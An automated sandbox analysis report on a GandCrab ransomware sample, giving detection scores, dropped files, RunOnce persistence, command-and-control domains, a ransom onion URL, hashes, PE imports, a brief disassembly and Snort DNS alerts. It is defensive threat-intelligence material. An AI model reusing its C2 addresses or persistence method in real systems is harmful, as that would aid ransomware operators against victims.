                        gI5xZdIxUs.exe86%VirustotalBrowse
                        gI5xZdIxUs.exe74%MetadefenderBrowse
                        gI5xZdIxUs.exe93%ReversingLabsWin32.Ransomware.GandCrab
                        gI5xZdIxUs.exe100%AviraTR/Dropper.Gen
                        gI5xZdIxUs.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe100%AviraTR/Dropper.Gen
                        C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe100%Joe Sandbox ML

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        1.2.gI5xZdIxUs.exe.fc60000.0.unpack100%AviraTR/Dropper.GenDownload File
                        14.0.isqmkp.exe.f9d0000.0.unpack100%AviraTR/Dropper.GenDownload File
                        20.2.isqmkp.exe.f9d0000.0.unpack100%AviraTR/Dropper.GenDownload File
                        14.2.isqmkp.exe.f9d0000.0.unpack100%AviraTR/Dropper.GenDownload File
                        1.0.gI5xZdIxUs.exe.fc60000.0.unpack100%AviraTR/Dropper.GenDownload File
                        20.0.isqmkp.exe.f9d0000.0.unpack100%AviraTR/Dropper.GenDownload File

                        Domains

                        SourceDetectionScannerLabelLink
                        nomoreransom.coin2%VirustotalBrowse
                        nomoreransom.bit1%VirustotalBrowse
                        gandcrab.bit2%VirustotalBrowse
                        dns1.soprodns.ru5%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b0%URL Reputationsafe
                        https://tox.chat/download.html0%URL Reputationsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        nomoreransom.coin
                        		unknown
                        		unknowntrueunknown
                        ipv4bot.whatismyipaddress.com
                        		unknown
                        		unknownfalse
                          		high
                          nomoreransom.bit
                          		unknown
                          		unknowntrueunknown
                          gandcrab.bit
                          		unknown
                          		unknowntrueunknown
                          dns1.soprodns.ru
                          		unknown
                          		unknowntrueunknown
                          dns2.soprodns.ru
                          		unknown
                          		unknowntrue
                            		unknown
                            8.8.8.8.in-addr.arpa
                            		unknown
                            		unknownfalse
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://ipv4bot.whatismyipaddress.com/agI5xZdIxUs.exe, 00000001.00000002.537080039.0000000000C7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://www.torproject.org/gI5xZdIxUs.exe, isqmkp.exe.1.drfalse
                                  		high
                                  http://ipv4bot.whatismyipaddress.com/4gI5xZdIxUs.exe, 00000001.00000002.537080039.0000000000C7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2bgI5xZdIxUs.exe, isqmkp.exe.1.drtrue
                                    • URL Reputation: safe
                                    		unknown
                                    http://ipv4bot.whatismyipaddress.com/gI5xZdIxUs.exe, 00000001.00000002.537080039.0000000000C7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://tox.chat/download.htmlgI5xZdIxUs.exe, isqmkp.exe.1.drfalse
                                      • URL Reputation: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      No contacted IP infos

                                      General Information

                                      Joe Sandbox Version:35.0.0 Citrine
                                      Analysis ID:694566
                                      Start date and time:2022-08-31 23:56:48 +02:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 9m 5s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:gI5xZdIxUs.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:62
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.rans.troj.evad.winEXE@85/2@305/0
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HDC Information:
                                      • Successful, ratio: 100% (good quality ratio 96%)
                                      • Quality average: 83.6%
                                      • Quality standard deviation: 24.5%
                                      HCA Information:
                                      • Successful, ratio: 99%
                                      • Number of executed functions: 43
                                      • Number of non-executed functions: 123
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Adjust boot time
                                      • Enable AMSI

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 20.82.228.9
                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, store-images.s-microsoft.com, neus2c-displaycatalog.frontdoor.bigcatalog.commerce.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      23:57:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce bwduumgtptl "C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe"
                                      23:58:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce bwduumgtptl "C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe"

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASNs

                                      No context

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a

                                      Download File
                                      Process:C:\Users\user\Desktop\gI5xZdIxUs.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):2218
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3::
                                      MD5:F97F9E17EAFDD0105A4E11BAFDE04B40
                                      SHA1:BA06A7ABE986A61B71889B80A6F9B02B22D40667
                                      SHA-256:4783424121E6C2F870DC931B374D20C62C764EDDC5769D2F536609ADC1226ABB
                                      SHA-512:778C4AAB55F6F0FE44DBC9A97F53B59EC8ED2E35901F77AFEBAEA57C738AD301412760709AB909B51335DDD7676CD8F8C1410C5751F2EF5CC74282BCD6C5F50E
                                      Malicious:false
                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\gI5xZdIxUs.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):101710
                                      Entropy (8bit):5.97549755837271
                                      Encrypted:false
                                      SSDEEP:1536:dZZZZZZZZZZZZpXzzzzzzzzzzzzV9rXounV98hbHnAwfMqqU+2bbbAV2/S2LkvdQ:BBounVyFHpfMqqDL2/LkvdmYvQd2a
                                      MD5:F4758788F11A0DE8D11EB4B8C515FFBD
                                      SHA1:04C1326C595D62977F53037F91B3FB863D4039BA
                                      SHA-256:DFCE3F5E421DEAF40DAB26ABDF67D5873968DB47B6DDE38787B90FF2CEAB3C96
                                      SHA-512:49C27F1DFA7C78C99C9055772D04BC89CEA41DF2DF027A400C915195FC82E8904FD89974F30CC7FD484A998DB0AE4B6F5440B5BA02FC56D2BB1ECE98117FBC38
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: Florian Roth
                                      • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: Florian Roth
                                      • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: Joe Security
                                      • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: ditekSHen
                                      • Rule: Gandcrab, Description: Gandcrab Payload, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: kevoreilly
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZ......................@...............................................!..L.!This .R.Y6.m cannot be run in DOS mode....$........Tg..:4..:4..:4..4..:4..4..:4...4..:4..:4..:4...4..:4..;42.:4...4..:4...4..:4...4..:4...4..:4Rich..:4........PE..L....Z.Z.............................K.......................................p............@.............................U...8........`.......................P.......................................................................................text.............................. ..`.rdata...p.......r..................@..@.data........ ......................@....CRT.........0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B.l2..........`......................@..@........................................................................................................................................................................................................................................

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):5.9754370991350365
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:gI5xZdIxUs.exe
                                      File size:101710
                                      MD5:98a12ec721c098842fbfd7384d5a72ae
                                      SHA1:9dfd7d1746c8ae943f3dced0f85f0e3c6f5084f3
                                      SHA256:f83457d173841c7e944bc60b00c197ca93c864893c71902cf1b1a36decdd30a4
                                      SHA512:a0b74851a36115822bf619a1a767cd76f57539a87dbbd4d452f309839f903ad7d94937a46acdcbc1e41bb50e381fe0fd2394122ec1260f05722a578030973ed8
                                      SSDEEP:1536:YZZZZZZZZZZZZpXzzzzzzzzzzzzV9rXounV98hbHnAwfMqqU+2bbbAV2/S2LkvdQ:WBounVyFHpfMqqDL2/LkvdmYvQd2a
                                      TLSH:F8A3490972E1A0A3E1E20679E5756EE5456E3C103F2496EB3993378D69728F0AD3B703
                                      File Content Preview:MZ......................@...............................................!..L.!This .<].e.m cannot be run in DOS mode....$.........Tg..:4..:4..:4...4..:4...4..:4...4..:4..:4..:4...4..:4..;42.:4...4..:4...4..:4...4..:4...4..:4Rich..:4........PE..L....Z.Z...

                                      File Icon

                                      Icon Hash:00828e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0x10004bf0
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x10000000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH
                                      Time Stamp:0x5A8C5AD9 [Tue Feb 20 17:28:57 2018 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:6b11af918234585a966ca8fab046dc6c

                                      Entrypoint Preview

                                      Instruction
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 0Ch
                                      mov dword ptr [ebp-0Ch], 00000001h
                                      mov eax, dword ptr [ebp+0Ch]
                                      mov dword ptr [ebp-08h], eax
                                      cmp dword ptr [ebp-08h], 01h
                                      jmp 00007F0364768A56h
                                      jmp 00007F0364768A7Ch
                                      jmp 00007F0364768A7Ah
                                      push 00000000h
                                      push 00000000h
                                      push 00000000h
                                      push 10004950h
                                      push 00000000h
                                      push 00000000h
                                      call dword ptr [1000A108h]
                                      mov dword ptr [ebp-04h], eax
                                      cmp dword ptr [ebp-04h], 00000000h
                                      je 00007F0364768A5Ch
                                      mov ecx, dword ptr [ebp-04h]
                                      push ecx
                                      call dword ptr [1000A10Ch]
                                      mov eax, dword ptr [ebp-0Ch]
                                      mov esp, ebp
                                      pop ebp
                                      retn 000Ch
                                      int3
                                      int3
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 5Ch
                                      push esi
                                      push 00000044h
                                      lea eax, dword ptr [ebp-58h]
                                      xorps xmm0, xmm0
                                      push 00000000h
                                      push eax
                                      mov esi, ecx
                                      movdqu dqword ptr [ebp-10h], xmm0
                                      call 00007F036476CE07h
                                      mov eax, dword ptr [10012A6Ch]
                                      add esp, 0Ch
                                      mov dword ptr [ebp-18h], eax
                                      mov dword ptr [ebp-1Ch], eax
                                      mov eax, dword ptr [10012A68h]
                                      or dword ptr [ebp-2Ch], 00000101h
                                      mov dword ptr [ebp-20h], eax
                                      xor eax, eax
                                      mov word ptr [ebp-28h], ax
                                      lea eax, dword ptr [ebp-10h]
                                      push eax
                                      lea eax, dword ptr [ebp-58h]
                                      mov dword ptr [ebp-58h], 00000044h
                                      push eax
                                      push 00000000h
                                      push 00000000h
                                      push 00000000h
                                      push 00000001h
                                      push 00000000h
                                      push 00000000h
                                      push esi
                                      push 00000000h
                                      call dword ptr [1000A164h]
                                      test eax, eax
                                      jne 00007F0364768A5Dh
                                      call dword ptr [1000A064h]
                                      pop esi
                                      mov esp, ebp
                                      pop ebp
                                      ret
                                      push dword ptr [ebp-10h]

                                      Rich Headers

                                      Programming Language:
                                      • [ C ] VS2013 build 21005
                                      • [IMP] VS2008 SP1 build 30729
                                      • [EXP] VS2013 build 21005
                                      • [RES] VS2013 build 21005
                                      • [LNK] VS2013 build 21005

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x104e00x55.rdata
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x105380xb4.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x200.l2
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x150000xac4.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0xa0000x1fc.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x82e80x8400False0.4593690814393939data6.340223357377212IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0xa0000x70a60x7200False0.4923245614035088data6.181274430024402IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x120000xa800xc00False0.3160807291666667data3.1174892908286225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .CRT0x130000x40x200False0.033203125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .rsrc0x140000x1e00x200False0.52734375data4.7176788329467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x150000xac40xc00False0.7802734375data6.4568381269501165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      .l20x160000x2000x200False0.52734375data4.7137725829467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountry
                                      RT_MANIFEST0x160600x17dXML 1.0 document textEnglishUnited States

                                      Imports

                                      DLLImport
                                      KERNEL32.dllSetFilePointer, GetFileAttributesW, ReadFile, GetLastError, MoveFileW, lstrcpyW, SetFileAttributesW, CreateMutexW, GetDriveTypeW, VerSetConditionMask, WaitForSingleObject, GetTickCount, InitializeCriticalSection, OpenProcess, GetSystemDirectoryW, TerminateThread, Sleep, TerminateProcess, VerifyVersionInfoW, WaitForMultipleObjects, DeleteCriticalSection, ExpandEnvironmentStringsW, lstrlenW, SetHandleInformation, lstrcatA, MultiByteToWideChar, CreatePipe, lstrcmpiA, Process32NextW, CreateToolhelp32Snapshot, LeaveCriticalSection, EnterCriticalSection, FindFirstFileW, lstrcmpW, FindClose, FindNextFileW, GetNativeSystemInfo, GetComputerNameW, GetDiskFreeSpaceW, GetWindowsDirectoryW, GetVolumeInformationW, LoadLibraryA, lstrcmpiW, VirtualFree, CreateThread, CloseHandle, lstrcatW, CreateFileMappingW, ExitThread, CreateFileW, GetModuleFileNameW, WriteFile, GetModuleHandleW, UnmapViewOfFile, MapViewOfFile, GetFileSize, GetEnvironmentVariableW, lstrcpyA, GetModuleHandleA, VirtualAlloc, GetProcAddress, Process32FirstW, GetTempPathW, GetProcessHeap, HeapFree, HeapAlloc, lstrlenA, CreateProcessW, ExitProcess, IsProcessorFeaturePresent
                                      USER32.dllBeginPaint, wsprintfW, TranslateMessage, LoadCursorW, LoadIconW, MessageBoxA, GetMessageW, EndPaint, DestroyWindow, RegisterClassExW, ShowWindow, CreateWindowExW, SendMessageW, DispatchMessageW, DefWindowProcW, UpdateWindow, GetForegroundWindow, SetWindowLongW
                                      GDI32.dllTextOutW
                                      ADVAPI32.dllFreeSid, RegSetValueExW, RegCreateKeyExW, RegCloseKey, CryptExportKey, CryptAcquireContextW, CryptGetKeyParam, CryptReleaseContext, CryptImportKey, CryptEncrypt, CryptGenKey, CryptDestroyKey, GetUserNameW, RegQueryValueExW, RegOpenKeyExW, AllocateAndInitializeSid
                                      SHELL32.dllShellExecuteW, SHGetSpecialFolderPathW, ShellExecuteExW
                                      CRYPT32.dllCryptStringToBinaryA, CryptBinaryToStringA
                                      WININET.dllInternetCloseHandle, HttpAddRequestHeadersW, HttpSendRequestW, InternetConnectW, HttpOpenRequestW, InternetOpenW, InternetReadFile
                                      PSAPI.DLLEnumDeviceDrivers, GetDeviceDriverBaseNameW

                                      Exports

                                      NameOrdinalAddress
                                      _ReflectiveLoader@010x10005ec0

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Snort IDS Alerts

                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      192.168.2.38.8.8.860754532829498 08/31/22-23:58:43.044195UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16075453192.168.2.38.8.8.8
                                      192.168.2.38.8.8.850789532829498 08/31/22-23:59:48.239260UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15078953192.168.2.38.8.8.8
                                      192.168.2.38.8.8.858305532829498 08/31/22-23:59:32.365598UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15830553192.168.2.38.8.8.8
                                      192.168.2.38.8.8.865389532829498 08/31/22-23:59:40.892307UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16538953192.168.2.38.8.8.8
                                      192.168.2.38.8.8.849203532026737 08/31/22-23:59:56.322889UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)4920353192.168.2.38.8.8.8
                                      192.168.2.38.8.8.856952532026737 08/31/22-23:58:46.555077UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5695253192.168.2.38.8.8.8
                                      192.168.2.38.8.8.853051532829498 08/31/22-23:59:12.297576UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15305153192.168.2.38.8.8.8
                                      192.168.2.38.8.8.853431532829498 08/31/22-23:59:18.287185UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15343153192.168.2.38.8.8.8
                                      192.168.2.38.8.8.865022532829498 08/31/22-23:58:54.690068UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16502253192.168.2.38.8.8.8
                                      192.168.2.38.8.8.861420532829498 08/31/22-23:59:01.493233UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16142053192.168.2.38.8.8.8
                                      192.168.2.38.8.8.851994532829498 08/31/22-23:59:24.206869UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15199453192.168.2.38.8.8.8
                                      192.168.2.38.8.8.860478532829498 08/31/22-23:59:59.939438UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16047853192.168.2.38.8.8.8
                                      192.168.2.38.8.8.865019532829498 08/31/22-23:58:54.630989UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16501953192.168.2.38.8.8.8
                                      192.168.2.38.8.8.850230532026737 09/01/22-00:00:07.433896UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5023053192.168.2.38.8.8.8
                                      192.168.2.38.8.8.860093532026737 08/31/22-23:59:14.413883UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6009353192.168.2.38.8.8.8
                                      192.168.2.38.8.8.858122532026737 08/31/22-23:59:27.247839UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5812253192.168.2.38.8.8.8
                                      192.168.2.38.8.8.865515532026737 08/31/22-23:59:20.761806UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6551553192.168.2.38.8.8.8
                                      192.168.2.38.8.8.852958532829498 08/31/22-23:58:07.331283UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15295853192.168.2.38.8.8.8
                                      192.168.2.38.8.8.854156532026737 08/31/22-23:59:42.281210UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5415653192.168.2.38.8.8.8
                                      192.168.2.38.8.8.865110532829498 08/31/22-23:58:33.358759UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16511053192.168.2.38.8.8.8
                                      192.168.2.38.8.8.853430532829498 08/31/22-23:59:18.269254UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15343053192.168.2.38.8.8.8
                                      192.168.2.38.8.8.858121532026737 08/31/22-23:59:27.189978UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5812153192.168.2.38.8.8.8
                                      192.168.2.38.8.8.865021532829498 08/31/22-23:58:54.669703UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16502153192.168.2.38.8.8.8
                                      192.168.2.38.8.8.858306532829498 08/31/22-23:59:32.396919UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15830653192.168.2.38.8.8.8
                                      192.168.2.38.8.8.864126532026737 08/31/22-23:59:50.649034UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6412653192.168.2.38.8.8.8
                                      192.168.2.38.8.8.858695532026737 08/31/22-23:58:36.600606UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5869553192.168.2.38.8.8.8
                                      192.168.2.38.8.8.861418532829498 08/31/22-23:59:01.454658UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16141853192.168.2.38.8.8.8
                                      192.168.2.38.8.8.865516532026737 08/31/22-23:59:20.780161UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6551653192.168.2.38.8.8.8
                                      192.168.2.38.8.8.865111532829498 08/31/22-23:58:33.379307UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16511153192.168.2.38.8.8.8
                                      192.168.2.38.8.8.865388532829498 08/31/22-23:59:40.874321UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16538853192.168.2.38.8.8.8
                                      192.168.2.38.8.8.858694532026737 08/31/22-23:58:36.580328UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5869453192.168.2.38.8.8.8
                                      192.168.2.38.8.8.854155532026737 08/31/22-23:59:42.262891UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5415553192.168.2.38.8.8.8
                                      192.168.2.38.8.8.852957532829498 08/31/22-23:58:07.312591UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15295753192.168.2.38.8.8.8
                                      192.168.2.38.8.8.849204532026737 08/31/22-23:59:56.342973UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)4920453192.168.2.38.8.8.8
                                      192.168.2.38.8.8.860586532026737 08/31/22-23:58:15.043750UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6058653192.168.2.38.8.8.8
                                      192.168.2.38.8.8.850231532026737 09/01/22-00:00:07.455721UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5023153192.168.2.38.8.8.8
                                      192.168.2.38.8.8.852959532829498 08/31/22-23:58:07.365561UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15295953192.168.2.38.8.8.8
                                      192.168.2.38.8.8.862054532829498 08/31/22-23:58:21.744663UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16205453192.168.2.38.8.8.8
                                      192.168.2.38.8.8.859641532026737 08/31/22-23:58:24.944174UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5964153192.168.2.38.8.8.8
                                      192.168.2.38.8.8.859638532026737 08/31/22-23:58:24.884406UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5963853192.168.2.38.8.8.8
                                      192.168.2.38.8.8.865198532026737 08/31/22-23:59:03.441447UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6519853192.168.2.38.8.8.8
                                      192.168.2.38.8.8.865109532829498 08/31/22-23:58:33.338202UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16510953192.168.2.38.8.8.8
                                      192.168.2.38.8.8.852457532829498 09/01/22-00:00:11.310934UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15245753192.168.2.38.8.8.8
                                      192.168.2.38.8.8.860587532026737 08/31/22-23:58:15.064663UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6058753192.168.2.38.8.8.8
                                      192.168.2.38.8.8.853470532026737 08/31/22-23:58:56.772805UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5347053192.168.2.38.8.8.8
                                      192.168.2.38.8.8.856620532026737 09/01/22-00:00:02.142088UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5662053192.168.2.38.8.8.8
                                      192.168.2.38.8.8.858693532026737 08/31/22-23:58:36.550637UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5869353192.168.2.38.8.8.8
                                      192.168.2.38.8.8.858696532026737 08/31/22-23:58:36.619047UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5869653192.168.2.38.8.8.8
                                      192.168.2.38.8.8.856954532026737 08/31/22-23:58:46.594398UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5695453192.168.2.38.8.8.8
                                      192.168.2.38.8.8.849205532026737 08/31/22-23:59:56.360951UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)4920553192.168.2.38.8.8.8
                                      192.168.2.38.8.8.856619532026737 09/01/22-00:00:02.120945UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5661953192.168.2.38.8.8.8
                                      192.168.2.38.8.8.851995532829498 08/31/22-23:59:24.227191UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15199553192.168.2.38.8.8.8
                                      192.168.2.38.8.8.861421532829498 08/31/22-23:59:01.511754UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16142153192.168.2.38.8.8.8
                                      192.168.2.38.8.8.852960532829498 08/31/22-23:58:07.384051UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15296053192.168.2.38.8.8.8
                                      192.168.2.38.8.8.865390532829498 08/31/22-23:59:40.910653UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16539053192.168.2.38.8.8.8
                                      192.168.2.38.8.8.853053532829498 08/31/22-23:59:12.348894UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15305353192.168.2.38.8.8.8
                                      192.168.2.38.8.8.854158532026737 08/31/22-23:59:42.322126UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5415853192.168.2.38.8.8.8
                                      192.168.2.38.8.8.860753532829498 08/31/22-23:58:43.024087UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16075353192.168.2.38.8.8.8
